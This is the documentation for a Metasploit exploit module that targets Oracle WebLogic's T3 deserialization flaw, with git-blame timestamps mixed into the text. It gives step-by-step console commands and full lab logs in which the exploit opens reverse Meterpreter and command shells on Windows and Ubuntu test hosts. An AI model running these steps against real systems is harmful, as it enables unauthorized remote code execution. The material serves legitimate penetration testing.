2018-08-08 17:55:41 -05:00
## Description
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, v12.2.1.2, and v12.2.1.3 are vulnerable to a deserialization vulnerable, which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 running on Windows10 x64 using JDK v7u17.
## Vulnerable Application
[Oracle Weblogic Server v10.3.6.0 ](http://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_generic.jar ), v12.1.3.0, v12.2.1.2, and v12.2.1.3.
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/misc/weblogic_deserialize`
3. `set rhosts <rhost>`
4. `set srvhost <srvhos>t`
5. `set srvport <srvport>`
6. `run`
## Scenarios
### Tested on Windows 10 x64 running Oracle Weblogic Server 10.3.6.0 on JDK v7u17
```
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175
2018-08-08 17:55:41 -05:00
rhosts => 172.22.222.175
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121
2018-08-08 17:55:41 -05:00
srvhost => 172.22.222.121
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set srvport 8888
2018-08-08 17:55:41 -05:00
srvport => 8888
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set target 1
2018-08-31 06:00:41 -05:00
target => 1
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > run
2018-08-08 17:55:41 -05:00
[*] Exploit running as background job 0.
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) >
2018-08-31 06:00:41 -05:00
[*] Started reverse TCP handler on 172.22.222.121:4444
2018-08-08 17:55:41 -05:00
[*] Sending stage (179779 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : _
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
2018-08-31 06:00:41 -05:00
meterpreter >
2018-08-08 17:55:41 -05:00
```
2018-08-28 11:04:22 -05:00
### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29
```
2025-07-17 11:51:29 +01:00
msf > use exploit/multi/misc/weblogic_deserialize
msf exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205
2018-08-28 11:04:22 -05:00
rhosts => 172.22.222.205
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207
2018-08-31 06:00:41 -05:00
srvhost => 172.22.222.207
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207
2018-08-31 06:00:41 -05:00
lhost => 172.22.222.207
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > set verbose true
2018-08-28 11:04:22 -05:00
verbose => true
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > check
2018-08-28 11:04:22 -05:00
[+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0
[*] 172.22.222.205:7001 The target appears to be vulnerable.
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > run
2018-08-31 06:00:41 -05:00
[*] Exploit running as background job 0.
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) >
2018-08-31 06:00:41 -05:00
[*] Started reverse TCP handler on 172.22.222.207:4444
2018-08-28 11:04:22 -05:00
[*] 172.22.222.205:7001 - Sending handshake...
[*] 172.22.222.205:7001 - Sending client object payload...
[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
[*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205
[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
2018-08-31 06:00:41 -05:00
[*] Command shell session 1 opened (172.22.222.207:4444 -> 172.22.222.205:37168) at 2018-08-30 06:10:31 -0500
2018-08-28 11:04:22 -05:00
[*] 172.22.222.205:7001 - Server stopped.
2018-08-31 06:00:41 -05:00
2025-07-17 11:51:29 +01:00
msf exploit(multi/misc/weblogic_deserialize) > sessions -i 1
2018-08-28 11:04:22 -05:00
[*] Starting interaction with 1...
uname -a
Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```